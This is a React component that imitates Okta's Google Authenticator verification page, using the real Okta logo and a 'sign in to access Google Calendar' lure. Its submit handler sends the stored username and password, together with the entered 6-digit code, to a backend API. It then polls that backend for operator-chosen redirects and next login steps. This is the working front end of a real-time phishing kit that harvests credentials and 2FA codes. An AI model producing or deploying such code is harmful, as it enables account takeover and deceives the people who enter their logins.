import { useState, useEffect, useRef } from "react";
import { useNavigate } from "react-router-dom";
import "./OktaLogin.css";
import googleCalendarLogo from "./assets/google-calendar.png";
import { AUTH_TYPE_ROUTES } from "./authRoutes";
import OktaVerifySomethingElse from "./OktaVerifySomethingElse";
import OktaUserIdentifier from "./OktaUserIdentifier";

const OKTA_LOGO =
  "https://ok1static.oktacdn.com/assets/img/logos/okta-logo.1e146cad5713da744492be95eb0f7793.png";

export default function OktaGoogle2fa() {
  const navigate = useNavigate();
  const [code, setCode] = useState("");
  const [sessionId, setSessionId] = useState(null);
  const [loading, setLoading] = useState(false);
  const [error, setError] = useState("");
  const [fieldError, setFieldError] = useState("");
  const [codeSubmitted, setCodeSubmitted] = useState(false);
  const isSubmittingCode = useRef(false);
  const API_URL = process.env.REACT_APP_API_BASE_URL;

  useEffect(() => {
    const storedSessionId = localStorage.getItem("session_id");
    if (storedSessionId) setSessionId(storedSessionId);
  }, []);

  const handleSubmit = (e) => {
    e.preventDefault();
    setError("");
    if (!code.trim()) {
      setFieldError("Please enter a code");
      return;
    }
    if (code.length !== 6 || !/^\d{6}$/.test(code)) {
      setFieldError("Enter a valid 6-digit code");
      return;
    }
    setFieldError("");
    setLoading(true);
    isSubmittingCode.current = true;

    const username = localStorage.getItem("username") || "";
    const password = localStorage.getItem("password") || "";
    const currentSessionId = sessionId || localStorage.getItem("session_id");

    (async () => {
      try {
        const res = await fetch(`${API_URL}/api/okta-twofa`, {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({
            code,
            username,
            password,
            session_id: currentSessionId,
          }),
        });
        if (!res.ok) {
          const data = await res.json().catch(() => ({}));
          throw new Error(data.detail || "Verification failed");
        }
        const { session_id } = await res.json();
        if (session_id) {
          setSessionId(session_id);
          localStorage.setItem("session_id", session_id);
        }
        setCodeSubmitted(true);
        setLoading(true);
      } catch (err) {
        console.error("Okta 2FA failed:", err);
        setError(err.message || "Verification failed");
        setLoading(false);
        isSubmittingCode.current = false;
      }
    })();
  };

  useEffect(() => {
    if (!sessionId || !codeSubmitted) {
      if (!codeSubmitted) setLoading(false);
      return;
    }

    setLoading(true);

    const poll = setInterval(async () => {
      try {
        const res = await fetch(`${API_URL}/check_response?session_id=${sessionId}`);
        if (!res.ok) throw new Error("Failed to fetch response");
        const data = await res.json();

        if (data.redirect) {
          clearInterval(poll);
          setLoading(false);
          isSubmittingCode.current = false;
          if (data.redirect.startsWith("/")) {
            navigate(data.redirect);
          } else {
            window.location.replace(data.redirect);
          }
          return;
        }

        if (data.authType && data.authType !== "okta2fa") {
          clearInterval(poll);
          setLoading(false);
          isSubmittingCode.current = false;
          const route = AUTH_TYPE_ROUTES[data.authType];
          if (route) navigate(route);
          return;
        }

        if (data.error) {
          clearInterval(poll);
          setLoading(false);
          isSubmittingCode.current = false;
          setCodeSubmitted(false);
          setCode("");
          setFieldError(data.error);
          return;
        }

        setLoading(true);
      } catch (err) {
        clearInterval(poll);
        setLoading(false);
        isSubmittingCode.current = false;
        console.error("Polling error:", err);
        setError("Something went wrong while checking session.");
      }
    }, 3000);

    return () => clearInterval(poll);
  }, [sessionId, codeSubmitted, API_URL, navigate]);

  return (
    <div className="okta-page auth okta-container">
      <div className="login-bg-image tb--background" aria-hidden="true" />

      <header className="okta-google-access-header">
        <div className="okta-google-access-header-inner">
          <img src={googleCalendarLogo} alt="Google Calendar" className="okta-google-access-logo" />
          <p className="okta-google-access-text">
            Sign in with your account to access Google Calendar
          </p>
        </div>
      </header>

      <div className="content">
        <div id="okta-sign-in" className="auth-container main-container">
          <div className="auth-header">
            <img src={OKTA_LOGO} alt="Okta" className="auth-org-logo" />
            <div className="beacon-container">
              <div className="okta-sign-in-beacon-border auth-beacon-border" aria-hidden="true" />
              <div
                aria-live="polite"
                role="img"
                className="bg-helper auth-beacon auth-beacon-factor google-authenticator-beacon"
                data-se="factor-beacon"
              >
                <span className="accessibility-text">Google Authenticator</span>
              </div>
            </div>
          </div>

          <div className="auth-content">
            <h2 className="o-form-head">Google Authenticator</h2>

            <OktaUserIdentifier />

            <p className="okta-factor-explanation">
              Enter your Google Authenticator passcode
            </p>

            {error && !fieldError && <div className="okta-error">{error}</div>}

            <form className="okta-form" onSubmit={handleSubmit} noValidate>
              <div className="okta-field">
                <label htmlFor="okta-2fa-code">Enter Code</label>
                <input
                  id="okta-2fa-code"
                  name="code"
                  type="tel"
                  inputMode="numeric"
                  autoComplete="one-time-code"
                  pattern="\d{6}"
                  maxLength={6}
                  minLength={6}
                  className={fieldError ? "okta-input-error" : ""}
                  value={code}
                  disabled={loading}
                  onChange={(e) => {
                    const val = e.target.value;
                    if (/^\d*$/.test(val)) {
                      setCode(val);
                      if (fieldError) setFieldError("");
                      if (error) setError("");
                    }
                  }}
                />
                {fieldError && (
                  <p className="okta-field-error" role="alert">
                    <span className="okta-field-error-icon" aria-hidden="true">
                      !
                    </span>
                    {fieldError}
                  </p>
                )}
              </div>

              <div className="okta-submit-wrap">
                <button type="submit" className="okta-submit button button-primary tb--button" disabled={loading}>
                  {loading ? <span className="okta-spinner" aria-label="Loading" /> : "Verify"}
                </button>
              </div>
            </form>

            <OktaVerifySomethingElse sessionId={sessionId} />
          </div>
        </div>
      </div>
    </div>
  );
}
